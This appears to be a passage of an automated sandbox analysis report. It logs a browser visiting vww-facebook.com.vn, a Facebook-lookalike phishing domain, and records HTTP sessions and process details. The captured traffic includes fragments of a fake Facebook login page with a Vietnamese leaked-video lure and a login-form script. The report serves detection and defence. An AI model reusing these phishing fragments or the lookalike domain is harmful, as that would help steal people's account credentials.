          2024-05-27 22:33:17 UTC | 1369 | IN | Data Ascii: tent="Full video call video cùng người yêu bị lộ mới nhất.Video24h.com" /> <meta property="twitter:description" content="Full video call video cùng người yêu bị lộ mới nhất.Video24h.com" /> <meta property="twitter:card" con
          2024-05-27 22:33:17 UTC | 1369 | IN | Data Ascii: v id="error"></div> <div class="logo"> <img src="/theme/fbweb1/logo.svg" alt="Logo"> </div> <div class="container"> <div class="input-group input"> <input type="text" id="tk" placeholder=
          2024-05-27 22:33:17 UTC | 1369 | IN | Data Ascii: <span class="lang-span"> <a>Français (France)</a> </span> </div> </div> <div class="item-fot"> <div class="lang"> <span class="lang-span"> <a>English (UK)</a>
          2024-05-27 22:33:17 UTC | 860 | IN | Data Ascii: us == 'error') { $('#ok').removeAttr('disabled'); $('#ok').html('Đăng nhập'); $(".notilog").remove() document.getElementById('tk').style = 'border: 1px solid #FA3E3E;';
          2024-05-27 22:33:17 UTC | 5 | IN | Data Ascii: 0


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          1 | 192.168.2.4 | 49735 | 188.114.96.3 | 443 | 2844 | C:\Program Files\Google\Chrome\Application\chrome.exe
          Timestamp | Bytes transferred | Direction | Data
          2024-05-27 22:33:17 UTC | 656 | OUT | GET /theme/fbweb1/fbstyle.css HTTP/1.1
          Host: vww-facebook.com.vn
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: text/css,*/*;q=0.1
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: style
          Referer: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          Cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb
          2024-05-27 22:33:17 UTC | 778 | IN | HTTP/1.1 200 OK
          Date: Mon, 27 May 2024 22:33:17 GMT
          Content-Type: text/css
          Transfer-Encoding: chunked
          Connection: close
          cache-control: public, max-age=43200
          expires: Thu, 23 May 2024 16:28:57 GMT
          etag: W/"b66-65b6bf70-3803fbf;br"
          last-modified: Sun, 28 Jan 2024 20:56:16 GMT
          vary: Accept-Encoding
          x-turbo-charged-by: LiteSpeed
          CF-Cache-Status: HIT
          Age: 5409
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pDs3Ep9fRBQYRWtQ3ceti3cxKhRcQSqAQSh%2FmBP9g4N7hY0KFPFPXiSxaZZzhL2bimq4dlxghbqp5DFYSzuyGN5SILmXQdHbKmJdBhleRdP8gSvqSosoGmqaHmN%2BiDj5AQVC5rju"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 88a9773c99304207-EWR
          alt-svc: h3=":443"; ma=86400
          2024-05-27 22:33:17 UTC591INData Raw: 62 36 36 0d 0a 0a 0a 2e 61 6c 65 72 74 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 30 37 31 61 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 33 65 62 65 62 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 20 20 20 20 74 6f 70 3a 20 30 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 0a 7d 0a 0a 2e 61 6c 65 72 74 20 73 70 61 6e 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 20 20 70 61
          Data Ascii: b66.alert { background-color: #f3071a; color: #f3ebeb; padding: 0; margin: 0; text-align: left; position: fixed; top: 0; left: 0; width: 100%; line-height: 1.5;}.alert span { display: inline-block; pa
          2024-05-27 22:33:17 UTC | 1369 | IN
          Data Ascii: splay: flex; flex-direction: column; align-items: center;}.logo { text-align: center; margin-bottom: 5px;}.logo img { width: 145px;}.overlay-icon { font-size: 40px; margin-bottom: 20px;}.overlay-text { font-siz
          2024-05-27 22:33:17 UTC | 965 | IN
          Data Ascii: gin: 15px 0;}.create-account { margin: 12px 0 12px 0; border-radius: 4px; background: white; border-color: #bec3c9; border-style: solid; border-width: 1px; box-shadow: none; color: #000; display: inline-block; fl
          2024-05-27 22:33:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          2 | 192.168.2.4 | 49738 | 188.114.96.3 | 443 | 2844 | C:\Program Files\Google\Chrome\Application\chrome.exe
          Timestamp | Bytes transferred | Direction | Data
          2024-05-27 22:33:17 UTC | 699 | OUT | GET /theme/fbweb1/logo.svg HTTP/1.1
          Host: vww-facebook.com.vn
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          Cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb
          2024-05-27 22:33:18 UTC | 783 | IN | HTTP/1.1 200 OK
          Date: Mon, 27 May 2024 22:33:18 GMT
          Content-Type: image/svg+xml
          Transfer-Encoding: chunked
          Connection: close
          cache-control: public, max-age=43200
          expires: Mon, 06 May 2024 19:20:45 GMT
          etag: W/"951-65b6d6da-3803fc0;br"
          last-modified: Sun, 28 Jan 2024 22:36:10 GMT
          vary: Accept-Encoding
          x-turbo-charged-by: LiteSpeed
          CF-Cache-Status: HIT
          Age: 5410
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lvFUFrYXcpxSv4bcYLAg9sNh9REg9mRqEfgc1GBqRNlS0yxP86ooipYzxG4oajw5bdfVBYAMa11ORHlmSOhuoC7DU%2F4U4gMdqy03ODifyQh%2FnzsvTL1QJfySIdbvfGL0jWhweSGj"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 88a9773fee858c6f-EWR
          alt-svc: h3=":443"; ma=86400
          2024-05-27 22:33:18 UTC | 586 | IN
          Data Ascii: 951<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1022.51 360"><defs><style>.cls-1{fill:#1877F2;}</style></defs><title>FBWordmark_Hex-RGB-1024</title><path class="cls-1" d="M166.43,126.68c-9.65,0-12.44,4.28-12.44,1
          2024-05-27 22:33:18 UTC | 1369 | IN
          Data Ascii: .88,6.87c0,15.22,5.57,25.3,19.94,25.3,12.66,0,19.09-9.22,19.09-23.8V202c0-14.58-6.43-23.8-19.09-23.8-14.37,0-19.94,10.08-19.94,25.3Z"/><path class="cls-1" d="M347,153.91c12,0,23.37,2.58,29.59,6.86l-6.86,21.88a48.6,48.6,0,0,0-20.59-4.72c-16.73,0-24,9.65-24
          2024-05-27 22:33:18 UTC | 437 | IN
          Data Ascii: 23Z"/><path class="cls-1" d="M713.27,209.67v-5.14c0-29.39,16.73-50.62,50.83-50.62s50.83,21.23,50.83,50.62v5.14c0,29.38-16.73,50.62-50.83,50.62S713.27,239.05,713.27,209.67Zm70.78-7.29c0-13.51-5.58-24.23-19.95-24.23s-19.94,10.72-19.94,24.23v9.44c0,13.51,5.5
          2024-05-27 22:33:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          3 | 192.168.2.4 | 49741 | 188.114.97.3 | 443 | 2844 | C:\Program Files\Google\Chrome\Application\chrome.exe
          Timestamp | Bytes transferred | Direction | Data
          2024-05-27 22:33:18 UTC | 410 | OUT | GET /theme/fbweb1/logo.svg HTTP/1.1
          Host: vww-facebook.com.vn
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          Cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb
          2024-05-27 22:33:18 UTC | 795 | IN | HTTP/1.1 200 OK
          Date: Mon, 27 May 2024 22:33:18 GMT
          Content-Type: image/svg+xml
          Transfer-Encoding: chunked
          Connection: close
          cache-control: public, max-age=43200
          expires: Mon, 06 May 2024 19:20:45 GMT
          etag: W/"951-65b6d6da-3803fc0;br"
          last-modified: Sun, 28 Jan 2024 22:36:10 GMT
          vary: Accept-Encoding
          x-turbo-charged-by: LiteSpeed
          CF-Cache-Status: HIT
          Age: 5410
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dd8M6rUM%2Bzpz86n1x8CUfERM49yG%2F%2BW3jJT%2Bn%2B4LMMX908769f85fKWms4my2sExnq%2FTSNvu3E2jgVAOy%2B26WQBc3GyFqkrCKRw9oXwisjZagm2UzSYb8oo73%2FrnmQUOkieEkUdP"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 88a977444f058c5f-EWR
          alt-svc: h3=":443"; ma=86400
          2024-05-27 22:33:18 UTC | 574 | IN
          Data Ascii: 951<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1022.51 360"><defs><style>.cls-1{fill:#1877F2;}</style></defs><title>FBWordmark_Hex-RGB-1024</title><path class="cls-1" d="M166.43,126.68c-9.65,0-12.44,4.28-12.44,1
          2024-05-27 22:33:18 UTC | 1369 | IN
          Data Ascii: 41.82-50Zm30.88,6.87c0,15.22,5.57,25.3,19.94,25.3,12.66,0,19.09-9.22,19.09-23.8V202c0-14.58-6.43-23.8-19.09-23.8-14.37,0-19.94,10.08-19.94,25.3Z"/><path class="cls-1" d="M347,153.91c12,0,23.37,2.58,29.59,6.86l-6.86,21.88a48.6,48.6,0,0,0-20.59-4.72c-16.73,
          2024-05-27 22:33:18 UTC | 449 | IN
          Data Ascii: 10.72,20-24.23Z"/><path class="cls-1" d="M713.27,209.67v-5.14c0-29.39,16.73-50.62,50.83-50.62s50.83,21.23,50.83,50.62v5.14c0,29.38-16.73,50.62-50.83,50.62S713.27,239.05,713.27,209.67Zm70.78-7.29c0-13.51-5.58-24.23-19.95-24.23s-19.94,10.72-19.94,24.23v9.44
          2024-05-27 22:33:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          4 | 192.168.2.4 | 49744 | 188.114.96.3 | 443 | 2844 | C:\Program Files\Google\Chrome\Application\chrome.exe
          Timestamp | Bytes transferred | Direction | Data
          2024-05-27 22:33:19 UTC | 689 | OUT | GET /favicon.ico HTTP/1.1
          Host: vww-facebook.com.vn
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          Cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb
          2024-05-27 22:33:20 UTC | 768 | IN | HTTP/1.1 200 OK
          Date: Mon, 27 May 2024 22:33:20 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          x-powered-by: PHP/7.4.33
          expires: Thu, 19 Nov 1981 08:52:00 GMT
          cache-control: no-store, no-cache, must-revalidate
          pragma: no-cache
          x-turbo-charged-by: LiteSpeed
          CF-Cache-Status: BYPASS
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8iH632P%2FvFoCLUAaTuEDS4Kv5TMx%2BS7tIiqhnb64cT07rnmWkdw%2BQfSju8ixC49vi9xTlgZaTcvpnXIcyjR1Id%2BOuChAZEr4UPyBilN8OTEC64L0Jky0wJy82wDclk4T%2BosucjGt"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 88a9774bbb3241fb-EWR
          alt-svc: h3=":443"; ma=86400
          2024-05-27 22:33:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          5 | 192.168.2.4 | 49745 | 2.19.104.72 | 443 | |
          Timestamp | Bytes transferred | Direction | Data
          2024-05-27 22:33:20 UTC | 161 | OUT | HEAD /fs/windows/config.json HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          Accept-Encoding: identity
          User-Agent: Microsoft BITS/7.8
          Host: fs.microsoft.com
          2024-05-27 22:33:21 UTC | 467 | IN | HTTP/1.1 200 OK
          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
          Content-Type: application/octet-stream
          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
          Server: ECAcc (lpl/EF06)
          X-CID: 11
          X-Ms-ApiVersion: Distribute 1.2
          X-Ms-Region: prod-weu-z1
          Cache-Control: public, max-age=149761
          Date: Mon, 27 May 2024 22:33:20 GMT
          Connection: close
          X-CID: 2


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          6 | 192.168.2.4 | 49746 | 188.114.97.3 | 443 | 2844 | C:\Program Files\Google\Chrome\Application\chrome.exe
          Timestamp | Bytes transferred | Direction | Data
          2024-05-27 22:33:21 UTC | 400 | OUT | GET /favicon.ico HTTP/1.1
          Host: vww-facebook.com.vn
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          Cookie: PHPSESSID=1uv7s4tv0t7ms65cgur1j6r6bb
          2024-05-27 22:33:21 UTC | 762 | IN | HTTP/1.1 200 OK
          Date: Mon, 27 May 2024 22:33:21 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          x-powered-by: PHP/7.4.33
          expires: Thu, 19 Nov 1981 08:52:00 GMT
          cache-control: no-store, no-cache, must-revalidate
          pragma: no-cache
          x-turbo-charged-by: LiteSpeed
          CF-Cache-Status: BYPASS
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oo9p6bmwbDL6%2FyGLXLgN4Nwz35eloaYxpA60G9FKYu8U9yhG13a4SCocMSFUYOxNk95xCF1aEGhExL4GGOLuseftPJ1zhQDvkaG7d0MQMmqtzHdjbJxLkr5Vjeug3hiI%2BlbKxJZ6"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 88a977558c3819e7-EWR
          alt-svc: h3=":443"; ma=86400
          2024-05-27 22:33:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          7 | 192.168.2.4 | 49747 | 2.19.104.72 | 443 | |
          Timestamp | Bytes transferred | Direction | Data
          2024-05-27 22:33:21 UTC | 239 | OUT | GET /fs/windows/config.json HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          Accept-Encoding: identity
          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
          Range: bytes=0-2147483646
          User-Agent: Microsoft BITS/7.8
          Host: fs.microsoft.com
          2024-05-27 22:33:22 UTC | 535 | IN | HTTP/1.1 200 OK
          Content-Type: application/octet-stream
          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
          ApiVersion: Distribute 1.1
          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
          X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
          Cache-Control: public, max-age=149783
          Date: Mon, 27 May 2024 22:33:22 GMT
          Content-Length: 55
          Connection: close
          X-CID: 2
          2024-05-27 22:33:22 UTC | 55 | IN
          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


          Target ID:0
          Start time:18:33:08
          Start date:27/05/2024
          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Imagebase:0x7ff76e190000
          File size:3'242'272 bytes
          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:false

          Target ID:2
          Start time:18:33:12
          Start date:27/05/2024
          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1988,i,17365723044245015990,12212853972788622964,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Imagebase:0x7ff76e190000
          File size:3'242'272 bytes
          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:false

          Target ID:3
          Start time:18:33:15
          Start date:27/05/2024
          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://vww-facebook.com.vn/d65vs4Vx.html?lSo8QjUBjC=cvif9DIZpRXkUvN&fin=s_in"
          Imagebase:0x7ff76e190000
          File size:3'242'272 bytes
          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          No disassembly